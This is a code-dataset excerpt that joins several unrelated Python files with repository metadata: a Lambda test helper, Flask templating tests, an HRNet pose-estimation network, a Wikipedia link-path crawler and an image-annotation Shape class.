return self.oss_setup()
def oss_setup(self,profile_name = None, account_id=None, region=None) -> OSS_Setup:
self.result = None
self.png_data = None
self.png_file = '/tmp/lambda_png_file.png'
return OSS_Setup(profile_name=profile_name,account_id=account_id,region_name=region)#.setup_test_environment()
def tearDown(self):
if self.result is not None:
Dev.pprint(self.result)
if self.png_data is not None:
if type(self.png_data) is not str:
Dev.pprint(f'Png data was not a string: {self.png_data}')
else:
try:
with open(self.png_file, "wb") as fh:
fh.write(base64.decodebytes(self.png_data.encode()))
Dev.pprint(f'Png data with size {len(self.png_data)} saved to {self.png_file}')
except Exception as error:
Dev.pprint(f'png save error: {error}')
Dev.pprint(self.png_data)
def lambda_package(self, lambda_name, profile_name = None, account_id=None, region=None):
return self.oss_setup(profile_name=profile_name,account_id=account_id,region=region).lambda_package(lambda_name)
@staticmethod
def print(result):
if result is not None:
Dev.pprint(result)
@staticmethod
def save_png(png_data, target_file):
if png_data is not None:
with open(target_file, "wb") as fh:
fh.write(base64.decodebytes(png_data.encode()))
| 35.836735
| 120
| 0.632688
|
4a0ebdbccdc379110607d08feb0208ba8c359faa
| 7,129
|
py
|
Python
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 5
|
2015-01-18T01:47:56.000Z
|
2016-01-30T14:58:58.000Z
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 6
|
2018-06-21T19:45:01.000Z
|
2018-06-21T19:45:02.000Z
|
flask/testsuite/templating.py
|
Khan/flask
|
e78e2a1641e5b7ad538d93154ee59445f4d4eaf7
|
[
"BSD-3-Clause"
] | 6
|
2018-07-14T04:58:02.000Z
|
2018-08-06T18:02:27.000Z
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.templating
~~~~~~~~~~~~~~~~~~~~~~~~~~
Template functionality
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import flask
import unittest
from flask.testsuite import FlaskTestCase
class TemplatingTestCase(FlaskTestCase):
def test_context_processing(self):
app = flask.Flask(__name__)
@app.context_processor
def context_processor():
return {'injected_value': 42}
@app.route('/')
def index():
return flask.render_template('context_template.html', value=23)
rv = app.test_client().get('/')
self.assert_equal(rv.data, '<p>23|42')
def test_original_win(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template_string('{{ config }}', config=42)
rv = app.test_client().get('/')
self.assert_equal(rv.data, '42')
def test_standard_context(self):
app = flask.Flask(__name__)
app.secret_key = 'development key'
@app.route('/')
def index():
flask.g.foo = 23
flask.session['test'] = 'aha'
return flask.render_template_string('''
{{ request.args.foo }}
{{ g.foo }}
{{ config.DEBUG }}
{{ session.test }}
''')
rv = app.test_client().get('/?foo=42')
self.assert_equal(rv.data.split(), ['42', '23', 'False', 'aha'])
def test_escaping(self):
text = '<p>Hello World!'
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.render_template('escaping_template.html', text=text,
html=flask.Markup(text))
lines = app.test_client().get('/').data.splitlines()
self.assert_equal(lines, [
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!',
'<p>Hello World!'
])
def test_no_escaping(self):
app = flask.Flask(__name__)
with app.test_request_context():
self.assert_equal(flask.render_template_string('{{ foo }}',
foo='<test>'), '<test>')
self.assert_equal(flask.render_template('mail.txt', foo='<test>'),
'<test> Mail')
def test_macros(self):
app = flask.Flask(__name__)
with app.test_request_context():
macro = flask.get_template_attribute('_macro.html', 'hello')
self.assert_equal(macro('World'), 'Hello World!')
def test_template_filter(self):
app = flask.Flask(__name__)
@app.template_filter()
def my_reverse(s):
return s[::-1]
self.assert_('my_reverse' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_add_template_filter(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse)
self.assert_('my_reverse' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['my_reverse'], my_reverse)
self.assert_equal(app.jinja_env.filters['my_reverse']('abcd'), 'dcba')
def test_template_filter_with_name(self):
app = flask.Flask(__name__)
@app.template_filter('strrev')
def my_reverse(s):
return s[::-1]
self.assert_('strrev' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_add_template_filter_with_name(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse, 'strrev')
self.assert_('strrev' in app.jinja_env.filters.keys())
self.assert_equal(app.jinja_env.filters['strrev'], my_reverse)
self.assert_equal(app.jinja_env.filters['strrev']('abcd'), 'dcba')
def test_template_filter_with_template(self):
app = flask.Flask(__name__)
@app.template_filter()
def super_reverse(s):
return s[::-1]
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'dcba')
def test_add_template_filter_with_template(self):
app = flask.Flask(__name__)
def super_reverse(s):
return s[::-1]
app.add_template_filter(super_reverse)
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'dcba')
def test_template_filter_with_name_and_template(self):
app = flask.Flask(__name__)
@app.template_filter('super_reverse')
def my_reverse(s):
return s[::-1]
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'dcba')
def test_add_template_filter_with_name_and_template(self):
app = flask.Flask(__name__)
def my_reverse(s):
return s[::-1]
app.add_template_filter(my_reverse, 'super_reverse')
@app.route('/')
def index():
return flask.render_template('template_filter.html', value='abcd')
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'dcba')
def test_custom_template_loader(self):
class MyFlask(flask.Flask):
def create_global_jinja_loader(self):
from jinja2 import DictLoader
return DictLoader({'index.html': 'Hello Custom World!'})
app = MyFlask(__name__)
@app.route('/')
def index():
return flask.render_template('index.html')
c = app.test_client()
rv = c.get('/')
self.assert_equal(rv.data, 'Hello Custom World!')
def test_iterable_loader(self):
app = flask.Flask(__name__)
@app.context_processor
def context_processor():
return {'whiskey': 'Jameson'}
@app.route('/')
def index():
return flask.render_template(
['no_template.xml', # should skip this one
'simple_template.html', # should render this
'context_template.html'],
value=23)
rv = app.test_client().get('/')
self.assert_equal(rv.data, '<h1>Jameson</h1>')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TemplatingTestCase))
return suite
| 34.946078
| 78
| 0.580025
|
4a0ebe3f4750565be9f1fd05a93536bbf178192e
| 18,030
|
py
|
Python
|
src/pose_estimator/model_hrnet.py
|
Liang813/GaitGraph
|
df8cfd8d1e7a91a738190ba68bc52a67207188e5
|
[
"MIT"
] | 57
|
2021-01-14T12:45:04.000Z
|
2022-03-22T08:57:26.000Z
|
src/pose_estimator/model_hrnet.py
|
KennChow/GaitGraph
|
749aa32ce079f0afaa39b15a90c8f1664f864436
|
[
"MIT"
] | 18
|
2021-02-07T07:37:08.000Z
|
2022-03-22T11:17:11.000Z
|
src/pose_estimator/model_hrnet.py
|
KennChow/GaitGraph
|
749aa32ce079f0afaa39b15a90c8f1664f864436
|
[
"MIT"
] | 18
|
2021-03-13T11:15:04.000Z
|
2022-03-28T05:10:34.000Z
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
import os
import logging
import torch
import torch.nn as nn
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class HighResolutionModule(nn.Module):
def __init__(self, num_branches, blocks, num_blocks, num_inchannels,
num_channels, fuse_method, multi_scale_output=True):
super(HighResolutionModule, self).__init__()
self._check_branches(
num_branches, blocks, num_blocks, num_inchannels, num_channels)
self.num_inchannels = num_inchannels
self.fuse_method = fuse_method
self.num_branches = num_branches
self.multi_scale_output = multi_scale_output
self.branches = self._make_branches(
num_branches, blocks, num_blocks, num_channels)
self.fuse_layers = self._make_fuse_layers()
self.relu = nn.ReLU(True)
def _check_branches(self, num_branches, blocks, num_blocks,
num_inchannels, num_channels):
if num_branches != len(num_blocks):
error_msg = 'NUM_BRANCHES({}) <> NUM_BLOCKS({})'.format(
num_branches, len(num_blocks))
logger.error(error_msg)
raise ValueError(error_msg)
if num_branches != len(num_channels):
error_msg = 'NUM_BRANCHES({}) <> NUM_CHANNELS({})'.format(
num_branches, len(num_channels))
logger.error(error_msg)
raise ValueError(error_msg)
if num_branches != len(num_inchannels):
error_msg = 'NUM_BRANCHES({}) <> NUM_INCHANNELS({})'.format(
num_branches, len(num_inchannels))
logger.error(error_msg)
raise ValueError(error_msg)
def _make_one_branch(self, branch_index, block, num_blocks, num_channels,
stride=1):
downsample = None
if stride != 1 or \
self.num_inchannels[branch_index] != num_channels[branch_index] * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(
self.num_inchannels[branch_index],
num_channels[branch_index] * block.expansion,
kernel_size=1, stride=stride, bias=False
),
nn.BatchNorm2d(
num_channels[branch_index] * block.expansion,
momentum=BN_MOMENTUM
),
)
layers = []
layers.append(
block(
self.num_inchannels[branch_index],
num_channels[branch_index],
stride,
downsample
)
)
self.num_inchannels[branch_index] = \
num_channels[branch_index] * block.expansion
for i in range(1, num_blocks[branch_index]):
layers.append(
block(
self.num_inchannels[branch_index],
num_channels[branch_index]
)
)
return nn.Sequential(*layers)
def _make_branches(self, num_branches, block, num_blocks, num_channels):
branches = []
for i in range(num_branches):
branches.append(
self._make_one_branch(i, block, num_blocks, num_channels)
)
return nn.ModuleList(branches)
def _make_fuse_layers(self):
if self.num_branches == 1:
return None
num_branches = self.num_branches
num_inchannels = self.num_inchannels
fuse_layers = []
for i in range(num_branches if self.multi_scale_output else 1):
fuse_layer = []
for j in range(num_branches):
if j > i:
fuse_layer.append(
nn.Sequential(
nn.Conv2d(
num_inchannels[j],
num_inchannels[i],
1, 1, 0, bias=False
),
nn.BatchNorm2d(num_inchannels[i]),
nn.Upsample(scale_factor=2**(j-i), mode='nearest')
)
)
elif j == i:
fuse_layer.append(None)
else:
conv3x3s = []
for k in range(i-j):
if k == i - j - 1:
num_outchannels_conv3x3 = num_inchannels[i]
conv3x3s.append(
nn.Sequential(
nn.Conv2d(
num_inchannels[j],
num_outchannels_conv3x3,
3, 2, 1, bias=False
),
nn.BatchNorm2d(num_outchannels_conv3x3)
)
)
else:
num_outchannels_conv3x3 = num_inchannels[j]
conv3x3s.append(
nn.Sequential(
nn.Conv2d(
num_inchannels[j],
num_outchannels_conv3x3,
3, 2, 1, bias=False
),
nn.BatchNorm2d(num_outchannels_conv3x3),
nn.ReLU(True)
)
)
fuse_layer.append(nn.Sequential(*conv3x3s))
fuse_layers.append(nn.ModuleList(fuse_layer))
return nn.ModuleList(fuse_layers)
def get_num_inchannels(self):
return self.num_inchannels
def forward(self, x):
if self.num_branches == 1:
return [self.branches[0](x[0])]
for i in range(self.num_branches):
x[i] = self.branches[i](x[i])
x_fuse = []
for i in range(len(self.fuse_layers)):
y = x[0] if i == 0 else self.fuse_layers[i][0](x[0])
for j in range(1, self.num_branches):
if i == j:
y = y + x[j]
else:
y = y + self.fuse_layers[i][j](x[j])
x_fuse.append(self.relu(y))
return x_fuse
blocks_dict = {
'BASIC': BasicBlock,
'BOTTLENECK': Bottleneck
}
class PoseHighResolutionNet(nn.Module):
def __init__(self, cfg, **kwargs):
self.inplanes = 64
extra = cfg['MODEL']['EXTRA']
super(PoseHighResolutionNet, self).__init__()
# stem net
self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=2, padding=1,
bias=False)
self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=2, padding=1,
bias=False)
self.bn2 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(Bottleneck, 64, 4)
self.stage2_cfg = extra['STAGE2']
num_channels = self.stage2_cfg['NUM_CHANNELS']
block = blocks_dict[self.stage2_cfg['BLOCK']]
num_channels = [
num_channels[i] * block.expansion for i in range(len(num_channels))
]
self.transition1 = self._make_transition_layer([256], num_channels)
self.stage2, pre_stage_channels = self._make_stage(
self.stage2_cfg, num_channels)
self.stage3_cfg = extra['STAGE3']
num_channels = self.stage3_cfg['NUM_CHANNELS']
block = blocks_dict[self.stage3_cfg['BLOCK']]
num_channels = [
num_channels[i] * block.expansion for i in range(len(num_channels))
]
self.transition2 = self._make_transition_layer(
pre_stage_channels, num_channels)
self.stage3, pre_stage_channels = self._make_stage(
self.stage3_cfg, num_channels)
self.stage4_cfg = extra['STAGE4']
num_channels = self.stage4_cfg['NUM_CHANNELS']
block = blocks_dict[self.stage4_cfg['BLOCK']]
num_channels = [
num_channels[i] * block.expansion for i in range(len(num_channels))
]
self.transition3 = self._make_transition_layer(
pre_stage_channels, num_channels)
self.stage4, pre_stage_channels = self._make_stage(
self.stage4_cfg, num_channels, multi_scale_output=False)
self.final_layer = nn.Conv2d(
in_channels=pre_stage_channels[0],
out_channels=cfg['MODEL']['NUM_JOINTS'],
kernel_size=extra['FINAL_CONV_KERNEL'],
stride=1,
padding=1 if extra['FINAL_CONV_KERNEL'] == 3 else 0
)
self.pretrained_layers = extra['PRETRAINED_LAYERS']
def _make_transition_layer(
self, num_channels_pre_layer, num_channels_cur_layer):
num_branches_cur = len(num_channels_cur_layer)
num_branches_pre = len(num_channels_pre_layer)
transition_layers = []
for i in range(num_branches_cur):
if i < num_branches_pre:
if num_channels_cur_layer[i] != num_channels_pre_layer[i]:
transition_layers.append(
nn.Sequential(
nn.Conv2d(
num_channels_pre_layer[i],
num_channels_cur_layer[i],
3, 1, 1, bias=False
),
nn.BatchNorm2d(num_channels_cur_layer[i]),
nn.ReLU(inplace=True)
)
)
else:
transition_layers.append(None)
else:
conv3x3s = []
for j in range(i+1-num_branches_pre):
inchannels = num_channels_pre_layer[-1]
outchannels = num_channels_cur_layer[i] \
if j == i-num_branches_pre else inchannels
conv3x3s.append(
nn.Sequential(
nn.Conv2d(
inchannels, outchannels, 3, 2, 1, bias=False
),
nn.BatchNorm2d(outchannels),
nn.ReLU(inplace=True)
)
)
transition_layers.append(nn.Sequential(*conv3x3s))
return nn.ModuleList(transition_layers)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(
self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False
),
nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def _make_stage(self, layer_config, num_inchannels,
multi_scale_output=True):
num_modules = layer_config['NUM_MODULES']
num_branches = layer_config['NUM_BRANCHES']
num_blocks = layer_config['NUM_BLOCKS']
num_channels = layer_config['NUM_CHANNELS']
block = blocks_dict[layer_config['BLOCK']]
fuse_method = layer_config['FUSE_METHOD']
modules = []
for i in range(num_modules):
# multi_scale_output is only used last module
if not multi_scale_output and i == num_modules - 1:
reset_multi_scale_output = False
else:
reset_multi_scale_output = True
modules.append(
HighResolutionModule(
num_branches,
block,
num_blocks,
num_inchannels,
num_channels,
fuse_method,
reset_multi_scale_output
)
)
num_inchannels = modules[-1].get_num_inchannels()
return nn.Sequential(*modules), num_inchannels
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.conv2(x)
x = self.bn2(x)
x = self.relu(x)
x = self.layer1(x)
x_list = []
for i in range(self.stage2_cfg['NUM_BRANCHES']):
if self.transition1[i] is not None:
x_list.append(self.transition1[i](x))
else:
x_list.append(x)
y_list = self.stage2(x_list)
x_list = []
for i in range(self.stage3_cfg['NUM_BRANCHES']):
if self.transition2[i] is not None:
x_list.append(self.transition2[i](y_list[-1]))
else:
x_list.append(y_list[i])
y_list = self.stage3(x_list)
x_list = []
for i in range(self.stage4_cfg['NUM_BRANCHES']):
if self.transition3[i] is not None:
x_list.append(self.transition3[i](y_list[-1]))
else:
x_list.append(y_list[i])
y_list = self.stage4(x_list)
x = self.final_layer(y_list[0])
return x
def init_weights(self, pretrained=''):
logger.info('=> init weights from normal distribution')
for m in self.modules():
if isinstance(m, nn.Conv2d):
# nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
nn.init.normal_(m.weight, std=0.001)
for name, _ in m.named_parameters():
if name in ['bias']:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.ConvTranspose2d):
nn.init.normal_(m.weight, std=0.001)
for name, _ in m.named_parameters():
if name in ['bias']:
nn.init.constant_(m.bias, 0)
if os.path.isfile(pretrained):
pretrained_state_dict = torch.load(pretrained)
logger.info('=> loading pretrained model {}'.format(pretrained))
need_init_state_dict = {}
for name, m in pretrained_state_dict.items():
if name.split('.')[0] in self.pretrained_layers \
or self.pretrained_layers[0] is '*':
need_init_state_dict[name] = m
self.load_state_dict(need_init_state_dict, strict=False)
elif pretrained:
logger.error('=> please download pre-trained models first!')
raise ValueError('{} is not exist!'.format(pretrained))
def get_pose_net(cfg, is_train, **kwargs):
model = PoseHighResolutionNet(cfg, **kwargs)
if is_train and cfg['MODEL']['INIT_WEIGHTS']:
model.init_weights(cfg['MODEL']['PRETRAINED'])
return model
| 36.204819
| 93
| 0.523849
|
4a0ebf32a498f4199f6c07c86166b766b7542b2c
| 3,911
|
py
|
Python
|
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | 3
|
2020-01-20T19:03:06.000Z
|
2020-06-10T02:42:29.000Z
|
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | null | null | null |
wiki.py
|
nzbr/wikigame
|
e05d10b97ca3e1d56757056d10c74c0ade6a39be
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/python3
from bs4 import BeautifulSoup
from multiprocessing import Pool
from sys import stdout
from urllib.parse import urljoin, quote
from urllib.request import urlopen
import argparse
import os
import traceback
parser = argparse.ArgumentParser()
parser.add_argument('cc', help='Country code for your Wikipedia (e.g. en, de)')
parser.add_argument('start', metavar='from', help='Name of the article you start with')
parser.add_argument('end', metavar='to', help='Name of the destination article')
args = parser.parse_args()
wikiurl = 'https://'+args.cc+'.wikipedia.org/wiki/'
def urlencode(text):
return quote(text.replace(" ", "_"))
class Page:
def __init__(self, url):
self.url = url
self.fetched = False
self.children = []
self.title = "?"+url.rsplit("/", 1)[-1]
self.processed = False
self.route = []
def fetch(self) -> None:
if self.fetched:
return
self.fetched = True
html = urlopen(self.url).read()
document = BeautifulSoup(html, features="lxml")
self.title = str(document.find_all(id="firstHeading")[0].contents[0])
article = document.find_all(id="mw-content-text")[0]
body = document.find_all(id="mw-content-text")[0]
self.children = [get_page_cached(urljoin(self.url, x["href"].rsplit("#",1)[0])) for x in body.find_all("a") if x.has_attr("href") and x["href"].startswith("/wiki/") and not ':' in x["href"]]
def fetch_async(self):
try:
self.fetch()
except:
traceback.print_exc()
return self
known_pages = {}
def get_page_cached(url: str) -> Page:
if url in known_pages:
return known_pages[url]
else:
return Page(url)
def print_line(text: str) -> None:
termwidth = os.get_terminal_size().columns
if len(text) > termwidth:
ext = "... "+str(len(text))
text = text[:termwidth-len(ext)] + ext
print(text)
def route_to_str(path: []) -> str:
first = True
result = ""
for elem in path:
if not first:
result += " -> "
else:
first = False
result += elem
return result
surl = wikiurl+urlencode(args.start)
eurl = wikiurl+urlencode(args.end)
# Crash if start or end article does not exist
startpage = get_page_cached(surl)
endpage = get_page_cached(eurl)
startpage.fetch()
endpage.fetch()
pool = Pool()
queue = [pool.apply_async(startpage.fetch_async, [])]
known_pages[surl] = startpage
qend = urlencode(endpage.title)
shortest = []
count = 0
print("FROM:\t"+startpage.title)
print("TO:\t"+endpage.title)
print("")
while len(queue) > 0:
count += 1
page = queue[0].get()
queue = queue[1:]
if page.processed:
continue
page.processed = True
route = page.route + [page.title]
ctitles = [child.title for child in page.children]
if "?"+qend in ctitles:
print("Possible hit!")
child = [c for c in page.children if c.title == "?"+qend][0]
print("> "+child.title)
child.fetch()
if child.title == endpage.title:
shortest = route + [child.title]
break
if page.title == endpage.title:
shortest = route
break
old = len(queue)
for child in page.children:
if not child.url in known_pages:
child.route = route
known_pages[child.url] = child
queue += [pool.apply_async(child.fetch_async, [])]
print_line(str(count) + " | "+ str(len(queue)) + " | " + str(len(queue)-old) + "/" + str(len(page.children)) + " ("+ "%.f" % (0 if len(page.children) == 0 else 100*(len(queue)-old)/len(page.children)) +"%) | " + route_to_str(route) + " -> "+str(ctitles))
print("\n")
if shortest == []:
print("No route found")
exit(1)
print(route_to_str(shortest))
# Kill all remaining fetch calls
pool.terminate()
| 26.248322
| 258
| 0.610841
|
4a0ebf840a213672ae1a3485f8163b6f082749f4
| 6,511
|
py
|
Python
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 3
|
2020-07-21T02:45:57.000Z
|
2021-02-27T10:49:13.000Z
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 1
|
2020-08-26T18:04:00.000Z
|
2020-08-27T14:10:37.000Z
|
libs/shape.py
|
llockhar/Medical-Image-Annotator
|
272df20be309f8b08ef6b56f91351df63857183f
|
[
"MIT"
] | 1
|
2022-01-31T04:43:57.000Z
|
2022-01-31T04:43:57.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
except ImportError:
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from libs.utils import distance
import sys
DEFAULT_LINE_COLOR = QColor(0, 255, 0, 128)
DEFAULT_FILL_COLOR = QColor(255, 0, 0, 128)
DEFAULT_SELECT_LINE_COLOR = QColor(255, 255, 255)
DEFAULT_SELECT_FILL_COLOR = QColor(0, 128, 255, 155)
DEFAULT_VERTEX_FILL_COLOR = QColor(0, 255, 0, 255)
DEFAULT_HVERTEX_FILL_COLOR = QColor(255, 0, 0)
MIN_Y_LABEL = 10
class Shape(object):
P_SQUARE, P_ROUND = range(2)
MOVE_VERTEX, NEAR_VERTEX = range(2)
# The following class variables influence the drawing
# of _all_ shape objects.
line_color = DEFAULT_LINE_COLOR
fill_color = DEFAULT_FILL_COLOR
select_line_color = DEFAULT_SELECT_LINE_COLOR
select_fill_color = DEFAULT_SELECT_FILL_COLOR
vertex_fill_color = DEFAULT_VERTEX_FILL_COLOR
hvertex_fill_color = DEFAULT_HVERTEX_FILL_COLOR
point_type = P_ROUND
point_size = 8
scale = 1.0
def __init__(self, label=None, line_color=None, difficult=False, paintLabel=False):
self.label = label
self.points = []
self.fill = False
self.selected = False
self.difficult = difficult
self.paintLabel = paintLabel
self._highlightIndex = None
self._highlightMode = self.NEAR_VERTEX
self._highlightSettings = {
self.NEAR_VERTEX: (4, self.P_ROUND),
self.MOVE_VERTEX: (1.5, self.P_SQUARE),
}
self._closed = False
if line_color is not None:
# Override the class line_color attribute
# with an object attribute. Currently this
# is used for drawing the pending line a different color.
self.line_color = line_color
def close(self):
self._closed = True
def reachMaxPoints(self):
if len(self.points) >= 4:
return True
return False
def addPoint(self, point):
if not self.reachMaxPoints():
self.points.append(point)
def popPoint(self):
if self.points:
return self.points.pop()
return None
def isClosed(self):
return self._closed
def setOpen(self):
self._closed = False
def paint(self, painter):
if self.points:
color = self.select_line_color if self.selected else self.line_color
pen = QPen(color)
# Try using integer sizes for smoother drawing(?)
pen.setWidth(max(1, int(round(2.0 / self.scale))))
painter.setPen(pen)
line_path = QPainterPath()
vrtx_path = QPainterPath()
line_path.moveTo(self.points[0])
# Uncommenting the following line will draw 2 paths
# for the 1st vertex, and make it non-filled, which
# may be desirable.
#self.drawVertex(vrtx_path, 0)
for i, p in enumerate(self.points):
line_path.lineTo(p)
self.drawVertex(vrtx_path, i)
if self.isClosed():
line_path.lineTo(self.points[0])
painter.drawPath(line_path)
painter.drawPath(vrtx_path)
painter.fillPath(vrtx_path, self.vertex_fill_color)
# Draw text at the top-left
if self.paintLabel:
min_x = sys.maxsize
min_y = sys.maxsize
for point in self.points:
min_x = min(min_x, point.x())
min_y = min(min_y, point.y())
if min_x != sys.maxsize and min_y != sys.maxsize:
font = QFont()
font.setPointSize(8)
font.setBold(True)
painter.setFont(font)
if(self.label == None):
self.label = ""
if(min_y < MIN_Y_LABEL):
min_y += MIN_Y_LABEL
painter.drawText(min_x, min_y, self.label)
if self.fill:
color = self.select_fill_color if self.selected else self.fill_color
painter.fillPath(line_path, color)
def drawVertex(self, path, i):
d = self.point_size / self.scale
shape = self.point_type
point = self.points[i]
if i == self._highlightIndex:
size, shape = self._highlightSettings[self._highlightMode]
d *= size
if self._highlightIndex is not None:
self.vertex_fill_color = self.hvertex_fill_color
else:
self.vertex_fill_color = Shape.vertex_fill_color
if shape == self.P_SQUARE:
path.addRect(point.x() - d / 2, point.y() - d / 2, d, d)
elif shape == self.P_ROUND:
path.addEllipse(point, d / 2.0, d / 2.0)
else:
assert False, "unsupported vertex shape"
def nearestVertex(self, point, epsilon):
for i, p in enumerate(self.points):
if distance(p - point) <= epsilon:
return i
return None
def containsPoint(self, point):
return self.makePath().contains(point)
def makePath(self):
path = QPainterPath(self.points[0])
for p in self.points[1:]:
path.lineTo(p)
return path
def boundingRect(self):
return self.makePath().boundingRect()
def moveBy(self, offset):
self.points = [p + offset for p in self.points]
def moveVertexBy(self, i, offset):
# print(i, self.points[i], offset)
self.points[i] = self.points[i] + offset
def highlightVertex(self, i, action):
self._highlightIndex = i
self._highlightMode = action
def highlightClear(self):
self._highlightIndex = None
def copy(self):
shape = Shape("%s" % self.label)
shape.points = [p for p in self.points]
shape.fill = self.fill
shape.selected = self.selected
shape._closed = self._closed
if self.line_color != Shape.line_color:
shape.line_color = self.line_color
if self.fill_color != Shape.fill_color:
shape.fill_color = self.fill_color
shape.difficult = self.difficult
return shape
def __len__(self):
return len(self.points)
def __getitem__(self, key):
return self.points[key]
def __setitem__(self, key, value):
self.points[key] = value
| 31.454106
| 87
| 0.590232
|
4a0ebf9e9875618da5760a6dd168d15b73e3fccc
| 173
|
py
|
Python
|
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
MathStudy.py
|
ReubenU/HelpfulGameAlgorithms
|
ae7760ee82e45d575e7b0d81f537530949d12c7e
|
[
"MIT"
] | null | null | null |
# Author: Reuben Unicruz
# Date: 4/9/2019
import math
# Sigmoid logistical function
def sigmoid(x):
return 1 / (1 + math.exp(-x))
print(sigmoid(1))
| 14.416667
| 34
| 0.601156
|
4a0ebfdedd00041c78110ce20f6b8ef9c1f29528
| 23,277
|
py
|
Python
|
venv/Lib/site-packages/git/test/test_refs.py
|
dhina016/OnCV
|
2429ba7bc8589e92b2c273af6e8763487e1e05a8
|
[
"Unlicense",
"MIT"
] | 1
|
2020-08-13T12:21:56.000Z
|
2020-08-13T12:21:56.000Z
|
